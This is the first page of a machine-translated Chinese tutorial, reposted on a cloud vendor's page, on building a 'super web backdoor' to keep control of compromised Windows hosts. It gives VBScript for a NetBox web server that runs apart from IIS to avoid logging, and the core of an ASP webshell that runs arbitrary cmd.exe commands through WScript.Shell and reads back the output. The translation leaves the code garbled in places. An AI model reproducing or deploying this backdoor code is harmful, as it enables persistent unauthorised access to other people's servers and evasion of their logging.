Home > Cloud Computing > Cloud Security

Easily create your own super WEB Backdoors

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

I. Preface
In today's era when Microsoft was in charge, it was no longer difficult to find bots. A variety of dummies greatly facilitated cainiao intrusion, but often the intrusion was successful. How can we fix the backdoor, catching bots for as long as possible often confuses cainiao like me. After using countless classic webshells on the internet, I decided to write my own webshells after I lost more than n hard-earned bots. So we have the following article.

Ii. netbox Introduction
By chance, I met netbox. Netbox is a development environment and running platform for Application Software Development and release using scripting language produced by Beijing Yida. NetBox allows you to use scripting languages (such as VBScript and Javascript) completely) create stable and efficient application software, and smoothly port to Windows 98 to Windows.. NET Server.
It can easily compile asp applications into independent execution programs, completely free from the limitations of iis (the program runs normally after iis is uninstalled), and runs directly on almost all Windows versions, there is no need to consider the platform compatibility and asp runtime environment requirements. At the same time, NetBox also provides a large number of extension components to make WEB applications more convenient. After talking so much, you must be eager to see this handsome guy.

3. Work together
If you already know a little about the script language VBScript or Javascript, you can start with me. Our task is to create a web server that has nothing to do with iis. It can provide FSO support for us to upload files conveniently. And supports the Script Host WSH, so that we can execute the command. In the root directory of the website, you can add your own asp Trojan horse or other Trojan Horse backdoors and execute them at any time.
First, we need to establish our web server. This server has nothing to do with IIS and can run even if it is uninstalled from IIS. The HttpServer object of NetBox can be easily used.
Write the following lines of code in Notepad:
Set httpd = CreateObject ("NetBox. HttpServer ")
* Create an httpserver object
If httpd. Create ("", 8000) = 0 Then
* Set the web Service port to 8000. You can change it by yourself. Do not conflict with other ports.
Set host = httpd. AddHost ("", "\ wwwroot ")
* Set the root directory of the web service to "wwwroot ".
Host. EnableScript = true
* The Web server can understand the server-side scripting programs, and supports both asp.
Host. AddDefault "default. asp"
Host. AddDefault "default.htm"
Host. AddDefault "index. asp"
Host. AddDefault "index.htm"
Host. AddDefault "default.html"
Host. AddDefault "index.html"
* Set the default file, which is equivalent to the default file in iis.
Httpd. Start
* Start Service
Else
Httpd. Stop
Shell. Quit 0
End If
End Sub
Save the file as main. box.
The source code of a server supporting asp is successfully written. It allows your asp Trojan to run as you like without worrying about logging. But now it is far from a backdoor, it only provides functions equivalent to those of IIS. To prevent webshells from being killed, we may write a simple CMD. ASP, of course, is not the simplest asp backdoor. You can upload files and execute commands.
Only the main code is analyzed here. The detailed code is included in the software package.
Set pyeWSH = server. createobject ("WSCRIPT. SHELL ")
* Create a shell (wshshell) object pyeWSH
Set pyeFSO = server. createobject ("scripting. filesystemobject ")
* Create a file system object pyeFSO for file operations.
SzTempFile = "C: \" & pyeFSO. GetTempName ()
* GetTempName () is a method for fso to create a temporary file.
Call pyeWSH. Run ("cmd.exe/c" & szCMD & ">" & szTempFile, 0, true)
* Call the run method of wshshell to execute the command and redirect the result to the temporary file.
Set oFile = pyeFSO. OpenTextFile (szTempFile, 1, False, 0)
* Open temporary files as read

  • 1
  • 2
  • Next Page
[Content navigation]
Page 1st: easily build your own super WEB Backdoor Page 2nd: easily build your own super WEB Backdoor

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More